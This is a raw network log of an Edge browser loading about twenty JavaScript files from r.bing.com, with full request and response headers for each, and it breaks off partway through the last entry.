Remote address:88.221.135.48:443RequestGET /rp/bdiAPlmUnJhdap3y8myDMEGlF4w.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCE8C2D89FAB3C
akamai-grn: 0.b48f655f.1734440521.1530a701
content-length: 20117
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: G9Suce+Oaa1LX/2Nx9LctQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ca56cff9-101e-0005-52de-1a1eef000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=176925
expires: Sat, 01 Feb 2025 23:12:33 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e762
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/WwTHOlBv_iLBpZXNWkp-HzVHgrM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCE8C2DB362309
content-length: 3498
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: qFAs4wCMzQBOlKg9KBk6eA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1c8cd8dc-201e-0060-74de-1aafb2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=40735
expires: Fri, 31 Jan 2025 09:22:43 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e763
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/CcMXS8Oo0OUnUE0LzYK9AFJ6la8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC5E23EBB645
content-length: 791
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: rqa21C4TqvhBKaqsPZN5dA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6fccaca9-f01e-0062-5c03-18ad48000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=79883
expires: Fri, 31 Jan 2025 20:15:11 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e764
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/R5OIlHZUEYWuNhJa46yx5Wir2pM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC6149E5871E
content-type: text/javascript; charset=utf-8
content-md5: sbJ/BFEx86eoWqpF1v/OBg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d45caf0c-501e-0020-2e31-16865c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 622
cache-control: public, no-transform, max-age=56648
expires: Fri, 31 Jan 2025 13:47:56 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e765
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/-gqBS9VzaGQOAafzweDVcqAD18I.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DD2C266DC050CA
content-length: 533
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: iXmM/0iacAzJj5a4uiRhcw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a7d240d9-d01e-0075-4275-5e6d2b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=135952
expires: Sat, 01 Feb 2025 11:49:40 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e766
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/1Jz2vFBGshGz47SHAQMwptTnpB0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCEC86B0CE8A0B
akamai-grn: 0.c68f655f.1734947915.29ac9315
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 328
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 15JqyZBsCgkATXocOIdHMw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: cae10e54-701e-003c-20be-205e4b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=420990
expires: Tue, 04 Feb 2025 19:00:18 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e767
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/Cah4LahmcqZwMC9LQrNkz-q8yNA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC5E250561B1
content-length: 476
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: dIetyGvEY3rWVcsphG5z6g==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f5164213-c01e-0048-32a8-14d80d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=373191
expires: Tue, 04 Feb 2025 05:43:39 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e769
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/7q76z2PhZYQSlMklnpUZ4ZrWoeg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC5D13CD0771
content-length: 310
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: L5ADL4PV6f4x84onM+3pfQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3f330063-901e-0072-7fe6-159bae000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=300612
expires: Mon, 03 Feb 2025 09:34:00 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e76a
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/MnlneN-7se6Sb8r2rU60mRHbccg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC6060BC5610
content-length: 247
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: pDodX6p5WFhmpgGbyxGATg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bd9fef0a-201e-0042-15cd-14c184000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=192553
expires: Sun, 02 Feb 2025 03:33:01 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e76b
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/HqDsKR6xyRoUSYXXRfEdLVt772I.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC5F3F15CCC5
content-length: 304
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: PX2MCYqpUzo58j8uZ/WgUQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1f4ddfdf-701e-003c-0e78-175e4b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=215073
expires: Sun, 02 Feb 2025 09:48:21 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e76c
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/u2MYL4Uj-EK9FdZPToQOipi2q40.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC67A73161B2
content-type: text/javascript; charset=utf-8
content-md5: rEFXJrf0kyk8MofTblrrHg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 15e28938-101e-0063-550e-16acb5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 517
cache-control: public, no-transform, max-age=125896
expires: Sat, 01 Feb 2025 09:02:04 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e76d
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/IzifzVeZAFUPAOVXA0p1w_tvqEA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DD163AE97BF649
content-type: text/javascript; charset=utf-8
content-md5: CPKqpyd3O29Qao9K5FGPzQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 551625ab-401e-0052-669b-48f762000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 359
cache-control: public, no-transform, max-age=128135
expires: Sat, 01 Feb 2025 09:39:23 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e76e
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/B-tRIg18CBKTY5_L9A8pOhYyyQo.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DD184F7CB91EEC
akamai-grn: 0.4eba1302.1737010947.1a45b6bb
content-length: 489
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: L9Hi8L0edLojA1c18kZUVA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: efd1a7bc-f01e-004b-5abe-4adb0a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=110134
expires: Sat, 01 Feb 2025 04:39:22 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e770
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/mRnHl5xOMNMCkNGN3wISIz0ETug.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DD0AE432F16745
content-length: 2290
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 0OgEsUc5afhLPnQZRYj75Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 980edd47-f01e-0004-5908-3d1f12000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=17506
expires: Fri, 31 Jan 2025 02:55:34 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e771
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/X9zPQVZQzKFTYze2B2WNn1LJCS4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC629CF7A282
content-type: text/javascript; charset=utf-8
content-md5: TLwZhqYro/p02/6N++ZW5g==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5016e5e2-b01e-002a-7f67-159fd5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 189
cache-control: public, no-transform, max-age=38647
expires: Fri, 31 Jan 2025 08:47:55 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e772
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/1u_LY-3P7BIagPGDkiUCRzkKi-0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCFC8829FC5441
content-type: text/javascript; charset=utf-8
content-md5: Db92/67CtFF0jljsKqPMeQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 970268eb-501e-0002-421c-2fe86a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 482
cache-control: public, no-transform, max-age=226776
expires: Sun, 02 Feb 2025 13:03:24 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e773
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/UJFGe_i3c1Lxhghza2lclR7CxpI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DD23CF7AB70C0C
akamai-grn: 0.43367a5c.1737100263.6e8e6e4
content-length: 2766
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: PkRqI9V277fNVfDgucCJ9w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2502f060-c01e-0061-3f0b-5eae4f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=67995
expires: Fri, 31 Jan 2025 16:57:03 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e776
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/3s0czFTJyV5b3KCC7geWICWvvPs.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCEC87A3ED1870
akamai-grn: 0.9b777b5c.1735343310.1305365a
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: F/FfhRxYlnuZTsg2+6i7VA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e2167499-b01e-006e-04b5-2643b9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1336
cache-control: public, no-transform, max-age=178948
expires: Sat, 01 Feb 2025 23:46:16 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e777
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/wNhUjm3kl_kvyfrio44J6j1zdYo.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC681EDAC2C8
